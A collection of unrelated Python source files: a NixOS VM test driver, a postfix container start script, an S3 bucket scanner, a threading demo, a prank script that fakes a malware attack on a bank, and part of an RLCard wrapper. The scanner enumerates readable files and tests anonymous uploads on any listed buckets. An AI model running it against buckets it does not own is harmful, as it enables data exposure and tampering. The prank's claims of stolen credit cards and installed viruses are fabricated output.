rc = int(self._next_newline_closed_block_from_shell().strip())
return (rc, output.decode())
def shell_interact(self) -> None:
"""Allows you to interact with the guest shell
Should only be used during test development, not in the production test."""
self.connect()
self.log("Terminal is ready (there is no prompt):")
assert self.shell
subprocess.run(
["socat", "READLINE", f"FD:{self.shell.fileno()}"],
pass_fds=[self.shell.fileno()],
)
def succeed(self, *commands: str) -> str:
"""Execute each command and check that it succeeds."""
output = ""
for command in commands:
with self.nested("must succeed: {}".format(command)):
(status, out) = self.execute(command)
if status != 0:
self.log("output: {}".format(out))
raise Exception(
"command `{}` failed (exit code {})".format(command, status)
)
output += out
return output
def fail(self, *commands: str) -> str:
"""Execute each command and check that it fails."""
output = ""
for command in commands:
with self.nested("must fail: {}".format(command)):
(status, out) = self.execute(command)
if status == 0:
raise Exception(
"command `{}` unexpectedly succeeded".format(command)
)
output += out
return output
def wait_until_succeeds(self, command: str, timeout: int = 900) -> str:
"""Wait until a command returns success and return its output.
Throws an exception on timeout.
"""
output = ""
def check_success(_: Any) -> bool:
nonlocal output
status, output = self.execute(command)
return status == 0
with self.nested("waiting for success: {}".format(command)):
retry(check_success, timeout)
return output
def wait_until_fails(self, command: str) -> str:
"""Wait until a command returns failure.
Throws an exception on timeout.
"""
output = ""
def check_failure(_: Any) -> bool:
nonlocal output
status, output = self.execute(command)
return status != 0
with self.nested("waiting for failure: {}".format(command)):
retry(check_failure)
return output
def wait_for_shutdown(self) -> None:
if not self.booted:
return
with self.nested("waiting for the VM to power off"):
sys.stdout.flush()
assert self.process
self.process.wait()
self.pid = None
self.booted = False
self.connected = False
def get_tty_text(self, tty: str) -> str:
status, output = self.execute(
"fold -w$(stty -F /dev/tty{0} size | "
"awk '{{print $2}}') /dev/vcs{0}".format(tty)
)
return output
def wait_until_tty_matches(self, tty: str, regexp: str) -> None:
"""Wait until the visible output on the chosen TTY matches regular
expression. Throws an exception on timeout.
"""
matcher = re.compile(regexp)
def tty_matches(last: bool) -> bool:
text = self.get_tty_text(tty)
if last:
self.log(
f"Last chance to match /{regexp}/ on TTY{tty}, "
f"which currently contains: {text}"
)
return len(matcher.findall(text)) > 0
with self.nested("waiting for {} to appear on tty {}".format(regexp, tty)):
retry(tty_matches)
def send_chars(self, chars: List[str]) -> None:
with self.nested("sending keys ‘{}‘".format(chars)):
for char in chars:
self.send_key(char)
def wait_for_file(self, filename: str) -> None:
"""Waits until the file exists in machine's file system."""
def check_file(_: Any) -> bool:
status, _ = self.execute("test -e {}".format(filename))
return status == 0
with self.nested("waiting for file ‘{}‘".format(filename)):
retry(check_file)
def wait_for_open_port(self, port: int) -> None:
def port_is_open(_: Any) -> bool:
status, _ = self.execute("nc -z localhost {}".format(port))
return status == 0
with self.nested("waiting for TCP port {}".format(port)):
retry(port_is_open)
def wait_for_closed_port(self, port: int) -> None:
def port_is_closed(_: Any) -> bool:
status, _ = self.execute("nc -z localhost {}".format(port))
return status != 0
retry(port_is_closed)
def start_job(self, jobname: str, user: Optional[str] = None) -> Tuple[int, str]:
return self.systemctl("start {}".format(jobname), user)
def stop_job(self, jobname: str, user: Optional[str] = None) -> Tuple[int, str]:
return self.systemctl("stop {}".format(jobname), user)
def wait_for_job(self, jobname: str) -> None:
self.wait_for_unit(jobname)
def connect(self) -> None:
if self.connected:
return
with self.nested("waiting for the VM to finish booting"):
self.start()
assert self.shell
tic = time.time()
self.shell.recv(1024)
# TODO: Timeout
toc = time.time()
self.log("connected to guest root shell")
self.log("(connecting took {:.2f} seconds)".format(toc - tic))
self.connected = True
def screenshot(self, filename: str) -> None:
out_dir = os.environ.get("out", os.getcwd())
word_pattern = re.compile(r"^\w+$")
if word_pattern.match(filename):
filename = os.path.join(out_dir, "{}.png".format(filename))
tmp = "{}.ppm".format(filename)
with self.nested(
"making screenshot {}".format(filename),
{"image": os.path.basename(filename)},
):
self.send_monitor_command("screendump {}".format(tmp))
ret = subprocess.run("pnmtopng {} > {}".format(tmp, filename), shell=True)
os.unlink(tmp)
if ret.returncode != 0:
raise Exception("Cannot convert screenshot")
def copy_from_host_via_shell(self, source: str, target: str) -> None:
"""Copy a file from the host into the guest by piping it over the
shell into the destination file. Works without host-guest shared folder.
Prefer copy_from_host for whenever possible.
"""
with open(source, "rb") as fh:
content_b64 = base64.b64encode(fh.read()).decode()
self.succeed(
f"mkdir -p $(dirname {target})",
f"echo -n {content_b64} | base64 -d > {target}",
)
def copy_from_host(self, source: str, target: str) -> None:
"""Copy a file from the host into the guest via the `shared_dir` shared
among all the VMs (using a temporary directory).
"""
host_src = Path(source)
vm_target = Path(target)
with tempfile.TemporaryDirectory(dir=self.shared_dir) as shared_td:
shared_temp = Path(shared_td)
host_intermediate = shared_temp / host_src.name
vm_shared_temp = Path("/tmp/shared") / shared_temp.name
vm_intermediate = vm_shared_temp / host_src.name
self.succeed(make_command(["mkdir", "-p", vm_shared_temp]))
if host_src.is_dir():
shutil.copytree(host_src, host_intermediate)
else:
shutil.copy(host_src, host_intermediate)
self.succeed(make_command(["mkdir", "-p", vm_target.parent]))
self.succeed(make_command(["cp", "-r", vm_intermediate, vm_target]))
def copy_from_vm(self, source: str, target_dir: str = "") -> None:
"""Copy a file from the VM (specified by an in-VM source path) to a path
relative to `$out`. The file is copied via the `shared_dir` shared among
all the VMs (using a temporary directory).
"""
# Compute the source, target, and intermediate shared file names
out_dir = Path(os.environ.get("out", os.getcwd()))
vm_src = Path(source)
with tempfile.TemporaryDirectory(dir=self.shared_dir) as shared_td:
shared_temp = Path(shared_td)
vm_shared_temp = Path("/tmp/shared") / shared_temp.name
vm_intermediate = vm_shared_temp / vm_src.name
intermediate = shared_temp / vm_src.name
# Copy the file to the shared directory inside VM
self.succeed(make_command(["mkdir", "-p", vm_shared_temp]))
self.succeed(make_command(["cp", "-r", vm_src, vm_intermediate]))
abs_target = out_dir / target_dir / vm_src.name
abs_target.parent.mkdir(exist_ok=True, parents=True)
# Copy the file from the shared directory outside VM
if intermediate.is_dir():
shutil.copytree(intermediate, abs_target)
else:
shutil.copy(intermediate, abs_target)
def dump_tty_contents(self, tty: str) -> None:
"""Debugging: Dump the contents of the TTY<n>"""
self.execute("fold -w 80 /dev/vcs{} | systemd-cat".format(tty))
def _get_screen_text_variants(self, model_ids: Iterable[int]) -> List[str]:
with tempfile.TemporaryDirectory() as tmpdir:
screenshot_path = os.path.join(tmpdir, "ppm")
self.send_monitor_command(f"screendump {screenshot_path}")
return _perform_ocr_on_screenshot(screenshot_path, model_ids)
def get_screen_text_variants(self) -> List[str]:
return self._get_screen_text_variants([0, 1, 2])
def get_screen_text(self) -> str:
return self._get_screen_text_variants([2])[0]
def wait_for_text(self, regex: str) -> None:
def screen_matches(last: bool) -> bool:
variants = self.get_screen_text_variants()
for text in variants:
if re.search(regex, text) is not None:
return True
if last:
self.log("Last OCR attempt failed. Text was: {}".format(variants))
return False
with self.nested("waiting for {} to appear on screen".format(regex)):
retry(screen_matches)
def wait_for_console_text(self, regex: str) -> None:
self.log("waiting for {} to appear on console".format(regex))
# Buffer the console output, this is needed
# to match multiline regexes.
console = io.StringIO()
while True:
try:
console.write(self.last_lines.get())
except queue.Empty:
self.sleep(1)
continue
console.seek(0)
matches = re.search(regex, console.read())
if matches is not None:
return
def send_key(self, key: str) -> None:
key = CHAR_TO_KEY.get(key, key)
self.send_monitor_command("sendkey {}".format(key))
def start(self) -> None:
if self.booted:
return
self.log("starting vm")
def clear(path: Path) -> Path:
if path.exists():
path.unlink()
return path
def create_socket(path: Path) -> socket.socket:
s = socket.socket(family=socket.AF_UNIX, type=socket.SOCK_STREAM)
s.bind(str(path))
s.listen(1)
return s
monitor_socket = create_socket(clear(self.monitor_path))
shell_socket = create_socket(clear(self.shell_path))
self.process = self.start_command.run(
self.state_dir,
self.shared_dir,
self.monitor_path,
self.shell_path,
)
self.monitor, _ = monitor_socket.accept()
self.shell, _ = shell_socket.accept()
# Store last serial console lines for use
# of wait_for_console_text
self.last_lines: Queue = Queue()
def process_serial_output() -> None:
assert self.process
assert self.process.stdout
for _line in self.process.stdout:
# Ignore undecodable bytes that may occur in boot menus
line = _line.decode(errors="ignore").replace("\r", "").rstrip()
self.last_lines.put(line)
self.log_serial(line)
self.serial_thread = threading.Thread(target=process_serial_output)
self.serial_thread.start()
self.wait_for_monitor_prompt()
self.pid = self.process.pid
self.booted = True
self.log("QEMU running (pid {})".format(self.pid))
def cleanup_statedir(self) -> None:
shutil.rmtree(self.state_dir)
rootlog.log(f"deleting VM state directory {self.state_dir}")
rootlog.log("if you want to keep the VM state, pass --keep-vm-state")
def shutdown(self) -> None:
if not self.booted:
return
assert self.shell
self.shell.send("poweroff\n".encode())
self.wait_for_shutdown()
def crash(self) -> None:
if not self.booted:
return
self.log("forced crash")
self.send_monitor_command("quit")
self.wait_for_shutdown()
def wait_for_x(self) -> None:
"""Wait until it is possible to connect to the X server. Note that
testing the existence of /tmp/.X11-unix/X0 is insufficient.
"""
def check_x(_: Any) -> bool:
cmd = (
"journalctl -b SYSLOG_IDENTIFIER=systemd | "
+ 'grep "Reached target Current graphical"'
)
status, _ = self.execute(cmd)
if status != 0:
return False
status, _ = self.execute("[ -e /tmp/.X11-unix/X0 ]")
return status == 0
with self.nested("waiting for the X11 server"):
retry(check_x)
def get_window_names(self) -> List[str]:
return self.succeed(
r"xwininfo -root -tree | sed 's/.*0x[0-9a-f]* \"\([^\"]*\)\".*/\1/; t; d'"
).splitlines()
def wait_for_window(self, regexp: str) -> None:
pattern = re.compile(regexp)
def window_is_visible(last_try: bool) -> bool:
names = self.get_window_names()
if last_try:
self.log(
"Last chance to match {} on the window list,".format(regexp)
+ " which currently contains: "
+ ", ".join(names)
)
return any(pattern.search(name) for name in names)
with self.nested("Waiting for a window to appear"):
retry(window_is_visible)
def sleep(self, secs: int) -> None:
# We want to sleep in *guest* time, not *host* time.
self.succeed(f"sleep {secs}")
def forward_port(self, host_port: int = 8080, guest_port: int = 80) -> None:
"""Forward a TCP port on the host to a TCP port on the guest.
Useful during interactive testing.
"""
self.send_monitor_command(
"hostfwd_add tcp::{}-:{}".format(host_port, guest_port)
)
def block(self) -> None:
"""Make the machine unreachable by shutting down eth1 (the multicast
interface used to talk to the other VMs). We keep eth0 up so that
the test driver can continue to talk to the machine.
"""
self.send_monitor_command("set_link virtio-net-pci.1 off")
def unblock(self) -> None:
"""Make the machine reachable."""
self.send_monitor_command("set_link virtio-net-pci.1 on")
def release(self) -> None:
if self.pid is None:
return
rootlog.info(f"kill machine (pid {self.pid})")
assert self.process
assert self.shell
assert self.monitor
assert self.serial_thread
self.process.terminate()
self.shell.close()
self.monitor.close()
self.serial_thread.join()
class VLan:
"""This class handles a VLAN that the run-vm scripts identify via its
number handles. The network's lifetime equals the object's lifetime.
"""
nr: int
socket_dir: Path
process: subprocess.Popen
pid: int
fd: io.TextIOBase
def __repr__(self) -> str:
return f"<Vlan Nr. {self.nr}>"
def __init__(self, nr: int, tmp_dir: Path):
self.nr = nr
self.socket_dir = tmp_dir / f"vde{self.nr}.ctl"
# TODO: don't side-effect environment here
os.environ[f"QEMU_VDE_SOCKET_{self.nr}"] = str(self.socket_dir)
rootlog.info("start vlan")
pty_master, pty_slave = pty.openpty()
self.process = subprocess.Popen(
["vde_switch", "-s", self.socket_dir, "--dirmode", "0700"],
stdin=pty_slave,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
shell=False,
)
self.pid = self.process.pid
self.fd = os.fdopen(pty_master, "w")
self.fd.write("version\n")
# TODO: perl version checks if this can be read from
# an if not, dies. we could hang here forever. Fix it.
assert self.process.stdout is not None
self.process.stdout.readline()
if not (self.socket_dir / "ctl").exists():
rootlog.error("cannot start vde_switch")
rootlog.info(f"running vlan (pid {self.pid})")
def __del__(self) -> None:
rootlog.info(f"kill vlan (pid {self.pid})")
self.fd.close()
self.process.terminate()
class Driver:
"""A handle to the driver that sets up the environment
and runs the tests"""
tests: str
vlans: List[VLan]
machines: List[Machine]
def __init__(
self,
start_scripts: List[str],
vlans: List[int],
tests: str,
keep_vm_state: bool = False,
):
self.tests = tests
tmp_dir = Path(os.environ.get("TMPDIR", tempfile.gettempdir()))
tmp_dir.mkdir(mode=0o700, exist_ok=True)
with rootlog.nested("start all VLans"):
self.vlans = [VLan(nr, tmp_dir) for nr in vlans]
def cmd(scripts: List[str]) -> Iterator[NixStartScript]:
for s in scripts:
yield NixStartScript(s)
self.machines = [
Machine(
start_command=cmd,
keep_vm_state=keep_vm_state,
name=cmd.machine_name,
tmp_dir=tmp_dir,
)
for cmd in cmd(start_scripts)
]
def __enter__(self) -> "Driver":
return self
def __exit__(self, *_: Any) -> None:
with rootlog.nested("cleanup"):
for machine in self.machines:
machine.release()
def subtest(self, name: str) -> Iterator[None]:
"""Group logs under a given test name"""
with rootlog.nested(name):
try:
yield
return True
except Exception as e:
rootlog.error(f'Test "{name}" failed with error: "{e}"')
raise e
def test_symbols(self) -> Dict[str, Any]:
@contextmanager
def subtest(name: str) -> Iterator[None]:
return self.subtest(name)
general_symbols = dict(
start_all=self.start_all,
test_script=self.test_script,
machines=self.machines,
vlans=self.vlans,
driver=self,
log=rootlog,
os=os,
create_machine=self.create_machine,
subtest=subtest,
run_tests=self.run_tests,
join_all=self.join_all,
retry=retry,
serial_stdout_off=self.serial_stdout_off,
serial_stdout_on=self.serial_stdout_on,
Machine=Machine, # for typing
)
machine_symbols = {m.name: m for m in self.machines}
# If there's exactly one machine, make it available under the name
# "machine", even if it's not called that.
if len(self.machines) == 1:
(machine_symbols["machine"],) = self.machines
vlan_symbols = {
f"vlan{v.nr}": self.vlans[idx] for idx, v in enumerate(self.vlans)
}
print(
"additionally exposed symbols:\n "
+ ", ".join(map(lambda m: m.name, self.machines))
+ ",\n "
+ ", ".join(map(lambda v: f"vlan{v.nr}", self.vlans))
+ ",\n "
+ ", ".join(list(general_symbols.keys()))
)
return {**general_symbols, **machine_symbols, **vlan_symbols}
def test_script(self) -> None:
"""Run the test script"""
with rootlog.nested("run the VM test script"):
symbols = self.test_symbols() # call eagerly
exec(self.tests, symbols, None)
def run_tests(self) -> None:
"""Run the test script (for non-interactive test runs)"""
self.test_script()
# TODO: Collect coverage data
for machine in self.machines:
if machine.is_up():
machine.execute("sync")
def start_all(self) -> None:
"""Start all machines"""
with rootlog.nested("start all VMs"):
for machine in self.machines:
machine.start()
def join_all(self) -> None:
"""Wait for all machines to shut down"""
with rootlog.nested("wait for all VMs to finish"):
for machine in self.machines:
machine.wait_for_shutdown()
def create_machine(self, args: Dict[str, Any]) -> Machine:
rootlog.warning(
"Using legacy create_machine(), please instantiate the"
"Machine class directly, instead"
)
tmp_dir = Path(os.environ.get("TMPDIR", tempfile.gettempdir()))
tmp_dir.mkdir(mode=0o700, exist_ok=True)
if args.get("startCommand"):
start_command: str = args.get("startCommand", "")
cmd = NixStartScript(start_command)
name = args.get("name", cmd.machine_name)
else:
cmd = Machine.create_startcommand(args) # type: ignore
name = args.get("name", "machine")
return Machine(
tmp_dir=tmp_dir,
start_command=cmd,
name=name,
keep_vm_state=args.get("keep_vm_state", False),
allow_reboot=args.get("allow_reboot", False),
)
def serial_stdout_on(self) -> None:
rootlog._print_serial_logs = True
def serial_stdout_off(self) -> None:
rootlog._print_serial_logs = False
class EnvDefault(argparse.Action):
"""An argpars Action that takes values from the specified
environment variable as the flags default value.
"""
def __init__(self, envvar, required=False, default=None, nargs=None, **kwargs): # type: ignore
if not default and envvar:
if envvar in os.environ:
if nargs is not None and (nargs.isdigit() or nargs in ["*", "+"]):
default = os.environ[envvar].split()
else:
default = os.environ[envvar]
kwargs["help"] = (
kwargs["help"] + f" (default from environment: {default})"
)
if required and default:
required = False
super(EnvDefault, self).__init__(
default=default, required=required, nargs=nargs, **kwargs
)
def __call__(self, parser, namespace, values, option_string=None): # type: ignore
setattr(namespace, self.dest, values)
if __name__ == "__main__":
arg_parser = argparse.ArgumentParser(prog="nixos-test-driver")
arg_parser.add_argument(
"-K",
"--keep-vm-state",
help="re-use a VM state coming from a previous run",
action="store_true",
)
arg_parser.add_argument(
"-I",
"--interactive",
help="drop into a python repl and run the tests interactively",
action="store_true",
)
arg_parser.add_argument(
"--start-scripts",
metavar="START-SCRIPT",
action=EnvDefault,
envvar="startScripts",
nargs="*",
help="start scripts for participating virtual machines",
)
arg_parser.add_argument(
"--vlans",
metavar="VLAN",
action=EnvDefault,
envvar="vlans",
nargs="*",
help="vlans to span by the driver",
)
arg_parser.add_argument(
"testscript",
action=EnvDefault,
envvar="testScript",
help="the test script to run",
type=Path,
)
args = arg_parser.parse_args()
if not args.keep_vm_state:
rootlog.info("Machine state will be reset. To keep it, pass --keep-vm-state")
with Driver(
args.start_scripts, args.vlans, args.testscript.read_text(), args.keep_vm_state
) as driver:
if args.interactive:
ptpython.repl.embed(driver.test_symbols(), {})
else:
tic = time.time()
driver.run_tests()
toc = time.time()
rootlog.info(f"test script finished in {(toc-tic):.2f}s")
|
start.py | #!/usr/bin/python3
import os
import glob
import shutil
import multiprocessing
import logging as log
import sys
from podop import run_server
from socrate import system, conf
log.basicConfig(stream=sys.stderr, level=os.environ.get("LOG_LEVEL", "WARNING"))
def start_podop():
os.setuid(100)
url = "http://" + os.environ["ADMIN_ADDRESS"] + "/internal/postfix/"
# TODO: Remove verbosity setting from Podop?
run_server(0, "postfix", "/tmp/podop.socket", [
("transport", "url", url + "transport/§"),
("alias", "url", url + "alias/§"),
("domain", "url", url + "domain/§"),
("mailbox", "url", url + "mailbox/§"),
("recipientmap", "url", url + "recipient/map/§"),
("sendermap", "url", url + "sender/map/§"),
("senderaccess", "url", url + "sender/access/§"),
("senderlogin", "url", url + "sender/login/§")
])
def is_valid_postconf_line(line):
return not line.startswith("#") \
and not line == ''
# Actual startup script
os.environ["FRONT_ADDRESS"] = system.get_host_address_from_environment("FRONT", "front")
os.environ["ADMIN_ADDRESS"] = system.get_host_address_from_environment("ADMIN", "admin")
os.environ["ANTISPAM_MILTER_ADDRESS"] = system.get_host_address_from_environment("ANTISPAM_MILTER", "antispam:11332")
os.environ["LMTP_ADDRESS"] = system.get_host_address_from_environment("LMTP", "imap:2525")
for postfix_file in glob.glob("/conf/*.cf"):
conf.jinja(postfix_file, os.environ, os.path.join("/etc/postfix", os.path.basename(postfix_file)))
if os.path.exists("/overrides/postfix.cf"):
for line in open("/overrides/postfix.cf").read().strip().split("\n"):
if is_valid_postconf_line(line):
os.system('postconf -e "{}"'.format(line))
if os.path.exists("/overrides/postfix.master"):
for line in open("/overrides/postfix.master").read().strip().split("\n"):
if is_valid_postconf_line(line):
os.system('postconf -Me "{}"'.format(line))
for map_file in glob.glob("/overrides/*.map"):
destination = os.path.join("/etc/postfix", os.path.basename(map_file))
shutil.copyfile(map_file, destination)
os.system("postmap {}".format(destination))
os.remove(destination)
if "RELAYUSER" in os.environ:
path = "/etc/postfix/sasl_passwd"
conf.jinja("/conf/sasl_passwd", os.environ, path)
os.system("postmap {}".format(path))
# Run Podop and Postfix
multiprocessing.Process(target=start_podop).start()
os.system("/usr/libexec/postfix/post-install meta_directory=/etc/postfix create-missing")
# Before starting postfix, we need to check permissions on /queue
# in the event that postfix,postdrop id have changed
os.system("postfix set-permissions")
os.execl("/usr/sbin/postfix", "postfix", "start-fg")
|
BucketScanner.py | #!/bin/env python
'''
--------------
BucketScanner
By @Rzepsky
--------------
======================= Notes =======================
This tool is made for legal purpose only!!! It allows you to:
- find collectable files for an anonymous/authenticated user in your buckets
- verify if an anonymous/authenticated user is allowed to upload arbitrary files to your buckets
====================== Options ======================
-l: specify a list with bucket names to check.
-w: specify a file to upload to a bucket.
-r: specify a regular expression to filter the output.
-s: look only for files bigger than 's' bytes
-m: look only for files smaller than 'm' bytes
-t: specify number of threads to use.
-o: specify an output file.
-h: prints a help message.
====================== Example ======================
$ python BucketScanner.py -l bucket_list.txt -w upload_file.txt -r '^.*\.(db|sql)' -t 50 -m 5242880 -o output.txt
The above command will:
- test all buckets from bucket_list.txt file
- test if you can upload upload_file.txt to any of the bucket included in bucket_list.txt
- provide URLs in output.txt only to files bigger than 5 MB and with .db or .sql extension
- work on 50 threads
'''
from argparse import ArgumentParser
from threading import Thread, Lock
import math
import boto3
import requests
import Queue
import re
import sys
queue = Queue.Queue()
AWS_ACCESS_KEY_ID = ''
AWS_SECRET_ACCESS_KEY = ''
class Settings(object):
def __init__(self):
self._WRITE_TEST_ENABLED = False
self._WRITE_TEST_FILE = False
self._OUTPUT_FILE = "output.txt"
self._MIN_SIZE = 1
self._MAX_SIZE = 0
self._REGEX = ".*"
self._ANONYMOUS_MODE = False
self._DISPLAY_SIZE = True
def set_write_test(self, write_file):
self._WRITE_TEST_ENABLED = True
self._WRITE_TEST_FILE = write_file
def set_output_file(self, output_file):
self._OUTPUT_FILE = output_file
def set_minsize(self, min_SIZE):
self._MIN_SIZE = min_SIZE
def set_maxsize(self, max_SIZE):
self._MAX_SIZE = max_SIZE
def set_anonymous_mode(self):
self._ANONYMOUS_MODE = True
print('''All tests will be executed in anonymous mode:
If you want to send all requests using your AWS account please specify
AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY variables in {0} file
'''.format(sys.argv[0]))
def set_regex(self, regex):
self._REGEX = regex
def get_region(bucket_name):
try:
response = requests.get('http://' + bucket_name + '.s3.amazonaws.com/')
region = response.headers.get('x-amz-bucket-region')
return region
except Exception as e:
print "Error: \
couldn't connect to '{0}' bucket. \
Details: {1}".format(response, e)
def get_session(bucket_name, region):
try:
if settings._ANONYMOUS_MODE:
sess = boto3.session.Session(region_name=region)
else:
sess = boto3.session.Session(
region_name=region,
aws_access_key_id=AWS_ACCESS_KEY_ID,
aws_secret_access_key=AWS_SECRET_ACCESS_KEY)
conn = sess.resource('s3')
bucket = conn.Bucket(bucket_name)
return bucket
except Exception as e:
print "Error: \
couldn't create a session with '{0}' bucket. \
Details: {1}".format(bucket_name, e)
def get_bucket(bucket_name):
region = get_region(bucket_name)
bucket = ""
if region == 'None':
print "Bucket '{0}' does not exist.".format(bucket_name.encode('utf-8'))
else:
bucket = get_session(bucket_name, region)
return bucket
def size(size_bytes):
size_name = ("B", "KB", "MB", "GB", "TB", "PB", "EB", "ZB", "YB")
i = int(math.floor(math.log(size_bytes, 1024)))
p = math.pow(1024, i)
s = round(size_bytes / p, 2)
return "{0}{1}".format(s, size_name[i])
def is_in_limits(minsize, maxsize, content_length):
if maxsize:
return minsize < content_length < maxsize
return minsize < content_length
def bucket_reader(bucket_name):
region = get_region(bucket_name)
if region == 'None':
pass
else:
print "Testing bucket {0}...".format(bucket_name)
bucket = get_bucket(bucket_name)
results = ""
try:
for s3_object in bucket.objects.all():
try:
content_length = s3_object.get()["ContentLength"]
if is_in_limits(settings._MIN_SIZE, settings._MAX_SIZE, content_length) and \
re.match(settings._REGEX, s3_object.key):
item = "http://s3.{0}.amazonaws.com/{1}/{2}".format(
region, bucket_name,
s3_object.key.encode('utf-8'))
results += item + '\n'
print "Collectable: {0} {1}".format(item, size(content_length))
except Exception as e:
print "Error: couldn't get '{0}' object in '{1}' bucket. Details: {2}\n".format(
s3_object.key.encode('utf-8'),
bucket_name, e)
append_output(results)
except Exception as e:
print "Error: couldn't access the '{0}' bucket. Details: {1}\n".format(bucket_name, e)
def write_test(bucket_name, filename):
region = get_region(bucket_name)
if region != 'None':
try:
data = open(filename, 'rb')
bucket = get_bucket(bucket_name)
bucket.put_object(Bucket=bucket_name, Key=filename, Body=data)
print "Success: \
bucket '{0}' allows for uploading arbitrary files!!!".format(bucket_name.encode('utf-8'))
results = "http://s3.{0}.amazonaws.com/{1}/{2}\n".format(region,
bucket_name,
filename)
append_output(results)
except Exception as e:
print "Error: \
couldn't upload a {0} file to {1}. Details: {2}\n".format(filename,
bucket_name,
e)
def append_output(results):
with open(settings._OUTPUT_FILE, "a") as output:
output.write(results)
def bucket_worker():
while True:
try:
bucket = queue.get()
bucket_reader(bucket)
if settings._WRITE_TEST_ENABLED:
write_test(bucket, settings._WRITE_TEST_FILE)
except Exception as e:
print "Error: {0}\n".format(e)
queue.task_done()
def print_help():
print('''
--------------
BucketScanner
By @Rzepsky
--------------
======================= Notes =======================
This tool is made for legal purpose only!!! It allows you to:
- find collectable files for an anonymous/authenticated user in your buckets
- verify if an anonymous/authenticated user is allowed to upload arbitrary files to your buckets
====================== Options ======================
-l: specify a list with bucket names to check.
-w: specify a file to upload to a bucket.
-r: specify a regular expression to filter the output.
-s: look only for files bigger than 's' bytes
-m: look only for files smaller than 'm' bytes
-t: specify number of threads to use.
-o: specify an output file.
-h: prints a help message.
====================== Example ======================
$ python BucketScanner.py -l bucket_list.txt -w upload_file.txt -r '^.*\.(db|sql)' -t 50 -m 5242880 -o output.txt
The above command will:
- test all buckets from bucket_list.txt file
- test if you can upload upload_file.txt to any of the bucket included in bucket_list.txt
- provide URLs in output.txt only to files bigger than 5 MB and with .db or .sql extension
- work on 50 threads
''')
def closing_words():
print "That's all folks! \
All collectable files can be found in {0}.".format(settings._OUTPUT_FILE)
if __name__ == "__main__":
parser = ArgumentParser()
parser.add_argument("-l", dest="bucket_list", required=True,
help="a list with bucket names.")
parser.add_argument("-w", dest="write", type=str, required=False,
default="", help="file to execute upload test.")
parser.add_argument("-r", dest="regex", required=False,
default='', help="regular expression filter")
parser.add_argument("-s", dest="min", type=int, required=False, default=1,
help="minimun size.")
parser.add_argument("-m", dest="max", type=int, required=False, default=0,
help="maximum size.")
parser.add_argument("-t", dest="threads", type=int, required=False,
default=10, help="thread count.")
parser.add_argument("-o", dest="output", type=str, required=False,
default="output.txt", help="output file.")
if len(sys.argv) == 1:
print_help()
sys.exit()
settings = Settings()
arguments = parser.parse_args()
if arguments.output is not "output.txt":
settings.set_output_file(arguments.output)
if arguments.write:
settings.set_write_test(arguments.write)
if arguments.regex:
settings.set_regex(arguments.regex)
if arguments.min > 1:
settings.set_minsize(arguments.min)
if arguments.max > 1:
settings.set_maxsize(arguments.max)
if not (AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY):
settings.set_anonymous_mode()
arguments = parser.parse_args()
for i in range(0, arguments.threads):
t = Thread(target=bucket_worker)
t.daemon = True
t.start()
with open(arguments.bucket_list, 'r') as f:
for bucket in f:
queue.put(bucket.rstrip())
queue.join()
closing_words()
|
daemon.py | ''' working threads vs daemon thread '''
import threading
import time
# Daemons are only useful when the main program is running,
# and it's okay to kill them off once the other non-daemon
# threads have exited. Without daemon threads, we have to
# keep track of them, and tell them to exit, before our
# program can completely quit. By setting them as daemon
# threads, we can let them run and forget about them, and
# when our program quits, any daemon threads are killed
# automatically.
def daemon():
'''
@brief simulates a ripetitive job
'''
while True:
time.sleep(1)
print('daemon')
def worker(worker_name, timing):
'''
@brief a function that does something
'''
for _ in range(100):
print(worker_name)
time.sleep(timing)
if __name__ == '__main__':
DAE = threading.Thread(target=daemon)
DAE.setDaemon(True)
DAE.start()
TH1 = threading.Thread(target=worker, args=('TH1', 0.1,))
TH2 = threading.Thread(target=worker, args=('TH2', 0.2,))
TH1.start()
TH2.start()
|
src.py | import sys
import os
import colorama
import string
from threading import Thread
from time import sleep
from random import uniform, choice, randrange
file = [".cobalt",".py", ".c", ".exe", ".cpp", ".cs", ".js", ".go", ".dll", ".virus", ".trojan", ".txt", ".malware", ".fake"]
def do_color(text):
print("\x1b[0;32;40m" + text + "\x1b[0m")
def do_red(text):
print("\x1b[0;31;40m" + text + "\x1b[0m")
def startProgress(title):
global progress_x
sys.stdout.write("\x1b[0;34;40m" + title + ": [" + "-"*40 + "]" + chr(8)*41 + "\x1b[0m")
sys.stdout.flush()
progress_x = 0
def progress(x):
global progress_x
x = int(x * 40 // 100)
sys.stdout.write("\x1b[0;31;40m" + "#" * (x - progress_x) + "\x1b[0m")
sys.stdout.flush()
progress_x = x
def endProgress():
sys.stdout.write("#" * (40 - progress_x) + "\x1b[0;34;40m" + "]\n" + "\x1b[0m")
sys.stdout.flush()
colorama.init()
def noInterrupt():
startProgress("Copying Malware To Bank of America Servers")
for i in range(101):
progress(i)
sleep(uniform(0, 0.07))
endProgress()
do_color("Done.")
startProgress("Activating Viruses")
for i in range(101):
progress(i)
sleep(uniform(0, 0.001))
endProgress()
do_color("Done.")
print("Making Credit Card Files..")
sleep(1)
for i in range(6000):
text = ''.join(choice(string.ascii_uppercase + string.digits + string.ascii_lowercase) for _ in range(50)) + choice(file)
print("\x1b[{};{};{}m".format(randrange(0, 8), randrange(31, 38), randrange(40, 48)) + text + "\x1b[0m")
do_color("\nDone.")
while True:
amount = input("How many passwords do you want to see (Enter n to leave): ")
if amount == "n":
break
for i in range(int(amount)):
text = ''.join(choice(string.digits) for _ in range(12))
password = ''.join(choice(string.ascii_uppercase + string.digits + string.ascii_lowercase) for _ in range(randrange(10, 40)))
print("Credit Card Number: " + text + "; " + "Password: " + password)
do_red("you left!!!! how dare you")
sleep(0.5)
do_red("I will destroy your computer")
sleep(0.5)
startProgress("Copying Malware To {}".format(os.getlogin()))
for i in range(101):
progress(i)
sleep(uniform(0, 0.001))
endProgress()
while True:
text = choice(["virus", "trojan", "fake", "no", "dumb"])
print("\x1b[{};{};{}m".format(randrange(0, 8), randrange(31, 38), randrange(40, 48)) + text + "\x1b[0m")
a = Thread(target=noInterrupt)
a.start()
a.join()
|
vec_env.py | '''
A wrapper for running multiple environments with multiple processes
Reference: https://github.com/openai/baselines/blob/master/baselines/common/vec_env/subproc_vec_env.py
'''
import multiprocessing as mp
from rlcard.utils import reorganize
class VecEnv(object):
'''
The wrraper for a vector of environments. Here, only the
basic interfaces of `env` are implemented. The vec environment
does not support going backward in the game tree.
'''
def __init__(self, env_id, config):
''' Initialize the VecEnv class
Args:
env_id (string): The id of the environment, e.g., 'blackjack'
